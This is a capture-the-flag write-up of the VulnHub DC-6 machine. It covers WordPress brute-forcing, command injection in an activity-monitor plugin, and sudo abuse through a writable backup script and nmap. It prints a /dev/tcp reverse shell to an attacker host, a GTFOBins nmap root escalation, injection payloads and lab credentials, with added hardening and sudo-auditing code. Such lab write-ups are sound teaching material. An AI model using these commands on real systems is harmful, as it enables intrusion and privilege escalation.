VulnHub: DC-6 Writeup

DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials for the admin panel with a brute-force attack. A vulnerable WP plugin can then be leveraged to gain a foothold on the system. A to-do note containing another user’s credentials is discovered while enumerating the home directories. For the root part, there are sudo privileges on a writable backup script and on nmap, which let me escalate to another user and then straight to root.

Reconnaissance

Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine’s IP address is most likely 192.168.2.104.

arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Arpscan

The initial nmap scan shows two ports open: SSH on port 22 and an Apache web server on port 80.

nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
Nmap scan

From the results above, port 80 redirects to http://wordy/. To resolve that hostname, I’ll add wordy to my /etc/hosts file.

echo '192.168.2.104   wordy' >> /etc/hosts

This page clearly states that it’s a WordPress site.

Wordy homepage

Nothing much to explore here, but the phrase “secure plugins” looks like a hint from the machine’s author.

Running the nmap http-wordpress scripts against this site enumerates several usernames.

nmap -p 80 --script "http-wordpress*" wordy
Nmap WordPress script

I’ll save those usernames into a file called users.

wpscan identifies two plugin vulnerabilities: an RCE and a user role privilege escalation.

wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
Wpscan

I’m interested in the RCE one, but first I’ll need credentials.

At that time I was stuck for a couple of hours. I asked for a nudge, and the answer was to brute force; I didn’t know that the box’s author had actually given us a hint to create a custom wordlist from rockyou.txt.

Clue

I’ll create a new wordlist from rockyou.txt and then use it for a brute-force attack with wpscan.

wpscan --url http://wordy/ --usernames users --passwords passwords.txt
Brute-force

It returns one valid credential: mark:helpdesk10.

Valid login

Foothold

With the credentials I obtained, I can log into the WP dashboard.

WP Dashboard

Based on the previous wpscan output, I searched for a PoC for the Plainview Activity Monitor RCE and found one on exploit-db.

The PoC abuses the plugin’s IP tools feature: the address submitted for lookup ends up in an OS command.

IP Lookup

I’ll hit the lookup button and intercept the request in Burp.

RCE is achieved by appending OS commands to the ip parameter after a pipe |, a semicolon ; (stacked command), or a logical OR ||. In this case I send a reverse shell.

Reverse shell
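To make the injection concrete, here is an added example (my code, not the plugin’s and not part of the original write-up): a constructed stand-in for a lookup feature that concatenates the user-supplied ip value into a shell command, next to a hardened version that allow-lists a literal IP address and never goes through a shell. The base command is echo so it runs safely offline; the real plugin wraps a network lookup tool, but the injection point is the same string concatenation. The three payloads use the separators named above, with "echo INJECTED" standing in for the reverse shell.

```python
import ipaddress
import subprocess


# Constructed stand-in for the plugin's lookup (assumption about its shape):
# the user value is glued into a command string and handed to /bin/sh.
def vulnerable_lookup(ip: str) -> str:
    cmd = "echo lookup " + ip          # attacker text is parsed by the shell
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_lookup(ip: str) -> str:
    # Fix 1: allow-list. Only a syntactically valid IPv4/IPv6 address passes;
    # any shell metacharacter fails this parse.
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError:
        raise ValueError(f"rejected lookup target: {ip!r}")
    # Fix 2: no shell. argv is a list, so even if the allow-list were later
    # loosened to hostnames, '|', ';' and '||' would stay plain characters.
    result = subprocess.run(["echo", "lookup", str(addr)],
                            capture_output=True, text=True, check=True)
    return result.stdout


def rejects(ip: str) -> bool:
    """True if the hardened lookup refuses the value."""
    try:
        hardened_lookup(ip)
    except ValueError:
        return True
    return False


# Constructed sample payloads, one per separator from the write-up.
# Note: '||' only fires when the left command exits non-zero; echo never
# fails, so against this stand-in the logic_or case runs nothing extra.
PAYLOADS = {
    "pipe":     "8.8.8.8| echo INJECTED",
    "stacked":  "8.8.8.8; echo INJECTED",
    "logic_or": "8.8.8.8|| echo INJECTED",
}


if __name__ == "__main__":
    for name, value in PAYLOADS.items():
        print(f"[vulnerable:{name}] {vulnerable_lookup(value)!r}")
        print(f"[hardened:{name}]   rejected={rejects(value)}")
    print(f"[hardened:clean]    {hardened_lookup('8.8.8.8')!r}")
```

The pipe case is the instructive one: the legitimate output is swallowed and only the injected command’s output comes back, which is why a tester sees nothing useful in the response and reaches for an out-of-band reverse shell instead. Against a real lookup tool, || becomes usable whenever the tool exits non-zero on the mangled argument.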

Privilege Escalation

The home directories are readable by www-data, and two files stand out: backups.sh and things-to-do.txt.

Interesting files

I immediately checked the contents of backups.sh and things-to-do.txt.

The backups.sh script is group-writable by devs, which I’ll note for later.

Contents of backups.sh

And things-to-do.txt contains graham’s credentials.

Contents of things-to-do.txt

I tried graham’s creds, graham:GSo7isUM1D4, over SSH, and they worked.

SSH graham

User graham has a sudo rule for the backups.sh script, which allows him to run it as user jens.

Sudo privileges on backups.sh

Because the script is also writable by graham (devs group), I can escalate to jens by appending a reverse shell line to the script and then running it as jens via sudo, with a listener waiting on port 9000.

graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Escalate to jens

I find that user jens is allowed to run nmap as root.

Sudo privileges on nmap

I can exploit this using the reference from GTFOBins. Newer nmap releases no longer have the old --interactive mode, so the route is an NSE script: whatever Lua file is passed to --script is executed by nmap, here as root.

jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Escalate to root
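Both escalations on this box come from the same quick check on sudo -l output: is the target something I can modify, or is it a binary that spawns a shell under sudo? Here is an added example (my code, not from the write-up) that parses sudo -l entries and flags both conditions. The fixture is constructed: a group-writable stand-in for backups.sh in a temp directory plus sudo -l text mirroring graham’s and jens’s rules; the GTFOBins set is a subset written from memory, and the real path /home/jens/backups.sh is replaced by the temp file so it runs anywhere.

```python
import os
import re
import tempfile

# One sudo -l entry: "(runas) [NOPASSWD:] /path/to/command [args]"
ENTRY_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<nopasswd>NOPASSWD:\s*)?(?P<cmd>\S.*?)\s*$"
)

# Subset of GTFOBins "sudo" entries that hand out a shell (from memory, extend as needed).
GTFOBINS_SUDO_SHELL = {
    "nmap", "vim", "vi", "find", "less", "more", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "man", "ftp",
}


def parse_sudo_l(output: str) -> list:
    """Extract runas / nopasswd / command path from `sudo -l` output."""
    entries = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue                      # header lines such as "User graham may run ..."
        entries.append({
            "runas": m["runas"].strip(),
            "nopasswd": m["nopasswd"] is not None,
            "path": m["cmd"].split()[0],  # first token is the command itself
        })
    return entries


def audit_entry(entry: dict) -> dict:
    """Add escalation indicators for one sudo entry."""
    path = entry["path"]
    finding = dict(entry)
    finding["exists"] = os.path.exists(path)
    # We can edit what sudo will run as the other user (the backups.sh case).
    finding["writable"] = finding["exists"] and os.access(path, os.W_OK)
    # A writable parent lets us replace the file even if it is read-only itself.
    finding["dir_writable"] = os.access(os.path.dirname(path) or ".", os.W_OK)
    # The binary is documented to spawn a shell under sudo (the nmap case).
    finding["gtfobin"] = os.path.basename(path) in GTFOBINS_SUDO_SHELL
    finding["escalation"] = finding["writable"] or finding["dir_writable"] or finding["gtfobin"]
    return finding


def audit(output: str) -> list:
    return [audit_entry(e) for e in parse_sudo_l(output)]


def build_fixture() -> str:
    """Constructed stand-in for the box: a group-writable backups.sh in a temp
    directory plus sudo -l text shaped like graham's and jens's rules."""
    workdir = tempfile.mkdtemp(prefix="dc6-")
    script = os.path.join(workdir, "backups.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n# placeholder, not the real backups.sh\n")
    os.chmod(script, 0o664)  # rw for owner and group, like devs on the box
    return (
        "User graham may run the following commands on dc-6:\n"
        f"    (jens) NOPASSWD: {script}\n"
        "    (root) NOPASSWD: /usr/bin/nmap\n"
    )


if __name__ == "__main__":
    for f in audit(build_fixture()):
        tag = "ESCALATION" if f["escalation"] else "ok"
        print(f"[{tag}] runas={f['runas']} nopasswd={f['nopasswd']} {f['path']} "
              f"writable={f['writable']} dir_writable={f['dir_writable']} gtfobin={f['gtfobin']}")
```

On a real target, feed it the output of sudo -l directly: audit(subprocess.check_output(["sudo", "-l"], text=True)). The dir_writable check matters even when the script itself is read-only, since a writable parent directory lets you swap the file out.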

And here is the flag:

Root flag of DC-6

Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io
